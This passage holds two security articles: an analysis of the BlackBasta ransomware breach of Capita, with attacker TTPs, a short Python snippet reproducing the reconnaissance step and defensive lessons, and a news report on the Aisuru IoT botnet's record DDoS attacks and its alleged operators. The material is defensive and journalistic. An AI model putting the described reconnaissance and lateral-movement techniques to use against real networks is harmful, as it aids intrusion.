In the ICO’s report, we learn that 6,024,221 data subjects for whom Capita was the data processor had personal data exfiltrated, as determined by Capita’s forensic provider.

The stolen data included sensitive information such as home addresses, email addresses, phone numbers, National Insurance numbers, driver’s licence scans, passport scans, bank account numbers and sort codes, credit card numbers, biometrics, criminal record checks, and employee login details.

BlackBasta Operator TTPs

The tactics, techniques, and procedures (TTPs) of the BlackBasta operators provided in the ICO’s breach timeline are useful for understanding the technical steps that led to the breach and ransomware attack. A summary of the attack has been mapped to the diamond model diagram below.

Outside of the breach timeline, some additional technical details were shared:

  • Following initial access, the Threat Actor accessed the ‘CAPITA\backupadmin’ service account approximately 4.5 hours later. Capita could not confirm how the Threat Actor was able to escalate their privileges; however, there were traces of Kerberos credential harvesting and reconnaissance activity found following the Incident.
  • The Threat Actor was able to use the ‘CAPITA\backupadmin’ domain administrator account to pivot to administrator accounts in different Capita domains. In total, no fewer than eight domains were compromised, a very large quantity of data was exfiltrated, and the Threat Actor attempted to deploy ransomware on at least 1,057 hosts.
  • Even though Capita quarantined the device through which the Threat Actor first gained access on 24 March 2023, by this time the Threat Actor had deployed software into the network which had enabled them to establish persistence and ultimately allowed them to continue moving laterally across the network into different Capita domains and to access/exfiltrate data, before deploying ransomware on 31 March 2023.

Interestingly, in February 2025, internal chat logs from the BlackBasta gang were leaked publicly online. Analysis of the leaked logs for references to Capita revealed the below command, shared by one of the BlackBasta members months after the attack happened:

The domain "corpcitrix.ad.capita.co.uk" appears to be an internal Active Directory domain name used by Capita to host its corporate Citrix environment. The "ad" label shows it’s an AD DNS namespace, "corpcitrix" indicates the environment is for Citrix-published desktops/apps or related infrastructure, and "capita.co.uk" is the organisation’s FQDN.

The command shown above is a PowerShell invocation (potentially via Cobalt Strike) that enumerates every system in the domain, resolves each machine’s IP address, and saves the results to a file named “SFS_pc.txt”. Powerpick runs the code in an unmanaged PowerShell environment and can execute without depending on powershell.exe.

In short, this command shows a BlackBasta operator performing network reconnaissance, mapping hosts to IP addresses (likely to plan lateral movement, targeting, exfiltration, or ransomware deployment).
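For defenders building detections, the resolve-and-log pattern behind that command is simple to reproduce. Below is a hedged Python sketch of the same reconnaissance pattern (resolve each hostname to an IP), assuming a host list is already in hand; it is illustrative only, not the operator’s actual tooling:

```python
import socket

def resolve_hosts(hostnames):
    """Map each hostname to its IPv4 address, or None if it does not resolve.

    Mirrors the recon output the operator wrote out: one host/IP pair per entry.
    """
    results = {}
    for host in hostnames:
        try:
            results[host] = socket.gethostbyname(host)
        except socket.gaierror:
            results[host] = None  # unresolvable host
    return results
```

A burst of such lookups, one per machine account in the domain, is itself a detectable signal: DNS query volume from a single workstation enumerating every host is rarely benign.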

Notable moments during the Incident

  • Critical alerts were mishandled or deprioritised: The initial malicious file (‘jdmb.js’) triggered a P2 (High) alert at 08:00 on 22 March 2023, indicating compromise. The SOC did not act for nearly 58 hours, despite automatic escalation warnings for missed service-level agreements (SLAs). The ICO also noted that “at no point in the six months before or after the Incident did Capita meet their SLA for any alert level.”
  • Excessive delay between detection and containment, plus a lack of automation: Isolation of the device from the rest of the Capita network still required human intervention, which took 58 hours to arrive. Capita’s SOC lacked the ability to isolate the device automatically. By then, the attacker had already gained domain admin access and moved laterally.
  • Inadequate incident response procedures: Capita did not invoke its Major Incident Management process until 09:22 on 29 March 2023, which was seven days after compromise. By that point, data exfiltration was already underway and it was two days before ransomware was deployed on 31 March 2023.
  • Understaffed and overburdened SOC team: Capita is understood to have had one SOC analyst per shift in place at the time of the Incident in March 2023. This, combined with historic underperformance, indicates systemic issues within the SOC, including inadequate staffing, insufficient training, and/or inefficient processes.

Lessons Learned from the BlackBasta Ransomware Attack on Capita

  • Having tools isn’t enough; they must be configured, integrated, and monitored effectively
    • Capita had Trellix EDR, a SIEM, and a SOC, but alerts were missed and containment delayed.
      • Lessons: Security tools are only as effective as the people, processes, and automation supporting them. Critical security alerts must have clear, measurable response times with automatic escalation if breached. Security Leadership must define and enforce strong Service Level Agreements (SLAs) for incident response.
  • Implement proper Active Directory (AD) tiering
    • Lack of AD tiering allowed attackers to move laterally from low-privilege systems to domain controllers (specifically a backup service account with domain admin privileges).
      • Lessons: Segregate admin privileges between tiers (workstations, servers, domain controllers) to contain breaches. Limit, rotate, and monitor privileged accounts using a PAM solution to enforce least privilege. Regularly review service accounts, ensure unique credentials, and monitor their activity for anomalies.
  • Act on penetration test findings promptly
    • Multiple pentests also warned of AD and privilege issues months before the breach, but fixes were delayed.
      • Lesson: Treat pentest reports as actionable tasks with deadlines and executive oversight.
  • Automate incident response where possible (SOAR)
    • Lack of Security Orchestration, Automation and Response (SOAR) led to manual triage delays.
      • Lesson: Use SOAR playbooks to automate containment, escalation, and alert enrichment for faster response.

Additional Resources

  1. Qakbot - https://attack.mitre.org/software/S0650/
  2. Cobalt Strike - https://attack.mitre.org/software/S0154/ 
  3. Bloodhound - https://attack.mitre.org/software/S0521/ 
  4. Rclone - https://attack.mitre.org/software/S1040/ 
  5. SystemBC - https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc   
  6. BlackBasta Ransomware - https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta 
  7. Credentials from Web Browsers (specifically performed by Qakbot) - https://attack.mitre.org/techniques/T1555/003/
  8. Steal or Forge Kerberos Tickets - https://attack.mitre.org/techniques/T1558/ 
  9. Exfiltration Over C2 Channel (performed by SystemBC and Rclone) - https://attack.mitre.org/techniques/T1041/
  10. BlackBasta Leaks: Lessons from the Ascension Health attack - https://blog.bushidotoken.net/2025/02/blackbasta-leaks-lessons-from-ascension.html 
  11. The Continuity of Conti - https://blog.bushidotoken.net/2022/11/the-continuity-of-conti.html 
  12. BlackBasta Group Profile (Ransomware Tool Matrix) - https://github.com/BushidoUK/Ransomware-Tool-Matrix/blob/main/GroupProfiles/BlackBasta.md 
  13. BlackBasta Group Profile (Ransomware Vuln Matrix) - https://github.com/BushidoUK/Ransomware-Vulnerability-Matrix/blob/main/GroupProfiles/BlackBasta.md

DDoS Botnet Aisuru Blankets US ISPs in Record DDoS

The world’s largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet’s attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

Since its debut more than a year ago, the Aisuru botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide.

The hacked systems that get subsumed into the botnet are mostly consumer-grade routers, security cameras, digital video recorders and other devices operating with insecure and outdated firmware, and/or factory-default settings. Aisuru’s owners are continuously scanning the Internet for these vulnerable devices and enslaving them for use in distributed denial-of-service (DDoS) attacks that can overwhelm targeted servers with crippling amounts of junk traffic.

As Aisuru’s size has mushroomed, so has its punch. In May 2025, KrebsOnSecurity was hit with a near-record 6.35 terabits per second (Tbps) attack from Aisuru, which was then the largest assault that Google’s DDoS protection service Project Shield had ever mitigated. Days later, Aisuru shattered that record with a data blast in excess of 11 Tbps.

By late September, Aisuru was publicly flexing DDoS capabilities topping 22 Tbps. Then on October 6, its operators heaved a whopping 29.6 terabits of junk data packets per second at a targeted host. Hardly anyone noticed, because it appears to have been a brief test or demonstration of Aisuru’s capabilities: the traffic flood lasted only a few seconds and was pointed at an Internet server that was specifically designed to measure large-scale DDoS attacks.

A measurement of an Oct. 6 DDoS believed to have been launched through multiple botnets operated by the owners of the Aisuru botnet. Image: DDoS Analyzer Community on Telegram.

Aisuru’s overlords aren’t just showing off. Their botnet is being blamed for a series of increasingly massive and disruptive attacks. Although recent assaults from Aisuru have targeted mostly ISPs that serve online gaming communities like Minecraft, those digital sieges often result in widespread collateral Internet disruption.

For the past several weeks, ISPs hosting some of the Internet’s top gaming destinations have been hit with a relentless volley of gargantuan attacks that experts say are well beyond the DDoS mitigation capabilities of most organizations connected to the Internet today.

Steven Ferguson is principal security engineer at Global Secure Layer (GSL), an ISP in Brisbane, Australia. GSL hosts TCPShield, which offers free or low-cost DDoS protection to more than 50,000 Minecraft servers worldwide. Ferguson told KrebsOnSecurity that on October 8, TCPShield was walloped with a blitz from Aisuru that flooded its network with more than 15 terabits of junk data per second.

Ferguson said that after the attack subsided, TCPShield was told by its upstream provider OVH that they were no longer welcome as a customer.

“This was causing serious congestion on their Miami external ports for several weeks, shown publicly via their weather map,” he said, explaining that TCPShield is now solely protected by GSL.

Traces from the recent spate of crippling Aisuru attacks on gaming servers can still be seen at the website blockgametracker.gg, which indexes the uptime and downtime of the top Minecraft hosts. In the following example from a series of data deluges on the evening of September 28, we can see that an Aisuru botnet campaign briefly knocked TCPShield offline.

An Aisuru botnet attack on TCPShield (AS64199) on Sept. 28  can be seen in the giant downward spike in the middle of this uptime graphic. Image: grafana.blockgametracker.gg.

Paging through the same uptime graphs for other network operators listed shows almost all of them suffered brief but repeated outages around the same time. Here is the same uptime tracking for Minecraft servers on the network provider Cosmic (AS30456), and it shows multiple large dips that correspond to game server outages caused by Aisuru.

Multiple DDoS attacks from Aisuru can be seen against the Minecraft host Cosmic on Sept. 28. The sharp downward spikes correspond to brief but enormous attacks from Aisuru. Image: grafana.blockgametracker.gg.

BOTNETS R US

Ferguson said he’s been tracking Aisuru for about three months, and recently he noticed the botnet’s composition shifted heavily toward infected systems at ISPs in the United States. Ferguson shared logs from an attack on October 8 that indexed traffic by the total volume sent through each network provider, and the logs showed that 11 of the top 20 traffic sources were U.S. based ISPs.

AT&T customers were by far the biggest U.S. contributors to that attack, followed by botted systems on Charter Communications, Comcast, T-Mobile and Verizon, Ferguson found. He said the volume of data packets per second coming from infected IoT hosts on these ISPs is often so high that it has started to affect the quality of service that ISPs are able to provide to adjacent (non-botted) customers.

“The impact extends beyond victim networks,” Ferguson said. “For instance we have seen 500 gigabits of traffic via Comcast’s network alone. This amount of egress leaving their network, especially being so US-East concentrated, will result in congestion towards other services or content trying to be reached while an attack is ongoing.”

Roland Dobbins is principal engineer at Netscout. Dobbins said Ferguson is spot on, noting that while most ISPs have effective mitigations in place to handle large incoming DDoS attacks, many are far less prepared to manage the inevitable service degradation caused by large numbers of their customers suddenly using some or all available bandwidth to attack others.

“The outbound and cross-bound DDoS attacks can be just as disruptive as the inbound stuff,” Dobbins said. “We’re now in a situation where ISPs are routinely seeing terabit-per-second plus outbound attacks from their networks that can cause operational problems.”

“The crying need for effective and universal outbound DDoS attack suppression is something that is really being highlighted by these recent attacks,” Dobbins continued. “A lot of network operators are learning that lesson now, and there’s going to be a period ahead where there’s some scrambling and potential disruption going on.”

KrebsOnSecurity sought comment from the ISPs named in Ferguson’s report. Charter Communications pointed to a recent blog post on protecting its network, stating that Charter actively monitors for both inbound and outbound attacks, and that it takes proactive action wherever possible.

“In addition to our own extensive network security, we also aim to reduce the risk of customer connected devices contributing to attacks through our Advanced WiFi solution that includes Security Shield, and we make Security Suite available to our Internet customers,” Charter wrote in an emailed response to questions. “With the ever-growing number of devices connecting to networks, we encourage customers to purchase trusted devices with secure development and manufacturing practices, use anti-virus and security tools on their connected devices, and regularly download security patches.”

A spokesperson for Comcast responded, “Currently our network is not experiencing impacts and we are able to handle the traffic.”

9 YEARS OF MIRAI

Aisuru is built on the bones of malicious code that was leaked in 2016 by the original creators of the Mirai IoT botnet. Like Aisuru, Mirai quickly outcompeted all other DDoS botnets in its heyday, and obliterated previous DDoS attack records with a 620 gigabit-per-second siege that sidelined this website for nearly four days in 2016.

The Mirai botmasters likewise used their crime machine to attack mostly Minecraft servers, but with the goal of forcing Minecraft server owners to purchase a DDoS protection service that they controlled. In addition, they rented out slices of the Mirai botnet to paying customers, some of whom used it to mask the sources of other types of cybercrime, such as click fraud.

A depiction of the outages caused by the Mirai botnet attacks against the internet infrastructure firm Dyn on October 21, 2016. Source: Downdetector.com.

Dobbins said Aisuru’s owners also appear to be renting out their botnet as a distributed proxy network that cybercriminal customers anywhere in the world can use to anonymize their malicious traffic and make it appear to be coming from regular residential users in the U.S.

“The people who operate this botnet are also selling (it as) residential proxies,” he said. “And that’s being used to reflect application layer attacks through the proxies on the bots as well.”

The Aisuru botnet harkens back to its predecessor Mirai in another intriguing way. One of its owners is using the Telegram handle “9gigsofram,” which corresponds to the nickname used by the co-owner of a Minecraft server protection service called Proxypipe that was heavily targeted in 2016 by the original Mirai botmasters.

Robert Coelho co-ran Proxypipe back then along with his business partner Erik “9gigsofram” Buckingham, and has spent the past nine years fine-tuning various DDoS mitigation companies that cater to Minecraft server operators and other gaming enthusiasts. Coelho said he has no idea why one of Aisuru’s botmasters chose Buckingham’s nickname, but added that it might say something about how long this person has been involved in the DDoS-for-hire industry.

“The Aisuru attacks on the gaming networks these past seven days have been absolutely huge, and you can see tons of providers going down multiple times a day,” Coelho said.

Coelho said the 15 Tbps attack this week against TCPShield was likely only a portion of the total attack volume hurled by Aisuru at the time, because much of it would have been shoved through networks that simply couldn’t process that volume of traffic all at once. Such outsized attacks, he said, are becoming increasingly difficult and expensive to mitigate.

“It’s definitely at the point now where you need to be spending at least a million dollars a month just to have the network capacity to be able to deal with these attacks,” he said.

RAPID SPREAD

Aisuru has long been rumored to use multiple zero-day vulnerabilities in IoT devices to aid its rapid growth over the past year. XLab, the Chinese security company that was the first to profile Aisuru’s rise in 2024, warned last month that one of the Aisuru botmasters had compromised the firmware distribution website for Totolink, a maker of low-cost routers and other networking gear.

“Multiple sources indicate the group allegedly compromised a router firmware update server in April and distributed malicious scripts to expand the botnet,” XLab wrote on September 15. “The node count is currently reported to be around 300,000.”

A malicious script implanted into a Totolink update server in April 2025. Image: XLab.

Aisuru’s operators received an unexpected boost to their crime machine in August when the U.S. Department of Justice charged the alleged proprietor of Rapper Bot, a DDoS-for-hire botnet that competed directly with Aisuru for control over the global pool of vulnerable IoT systems.

Once Rapper Bot was dismantled, Aisuru’s curators moved quickly to commandeer vulnerable IoT devices that were suddenly set adrift by the government’s takedown, Dobbins said.

“Folks were arrested and Rapper Bot control servers were seized and that’s great, but unfortunately the botnet’s attack assets were then pieced out by the remaining botnets,” he said. “The problem is, even if those infected IoT devices are rebooted and cleaned up, they will still get re-compromised by something else generally within minutes of being plugged back in.”

A screenshot shared by XLab showing the Aisuru botmasters recently celebrating a record-breaking 7.7 Tbps DDoS. The user at the top has adopted the name “Ethan J. Foltz” in a mocking tribute to the alleged Rapper Bot operator who was arrested and charged in August 2025.

BOTMASTERS AT LARGE

XLab’s September blog post cited multiple unnamed sources saying Aisuru is operated by three cybercriminals: “Snow,” who’s responsible for botnet development; “Tom,” tasked with finding new vulnerabilities; and “Forky,” responsible for botnet sales.

KrebsOnSecurity interviewed Forky in our May 2025 story about the record 6.3 Tbps attack from Aisuru. That story identified Forky as a 21-year-old man from São Paulo, Brazil who has been extremely active in the DDoS-for-hire scene since at least 2022. The FBI has seized Forky’s DDoS-for-hire domains several times over the years.

Like the original Mirai botmasters, Forky also operates a DDoS mitigation service called Botshield. Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

In our previous interview, Forky acknowledged being involved in the development and marketing of Aisuru, but denied participating in attacks launched by the botnet.

Reached for comment earlier this month, Forky continued to maintain his innocence, claiming that he, too, is still trying to figure out who the current Aisuru botnet operators are in real life (Forky said the same thing in our May interview).

But after a week of promising juicy details, Forky came up empty-handed once again. Suspecting that Forky was merely being coy, I asked him how someone so connected to the DDoS-for-hire world could still be mystified on this point, and suggested that his inability or unwillingness to blame anyone else for Aisuru would not exactly help his case.

At this, Forky verbally bristled at being pressed for more details, and abruptly terminated our interview.

“I’m not here to be threatened with ignorance because you are stressed,” Forky replied. “They’re blaming me for those new attacks. Pretty much the whole world (is) due to your blog.”
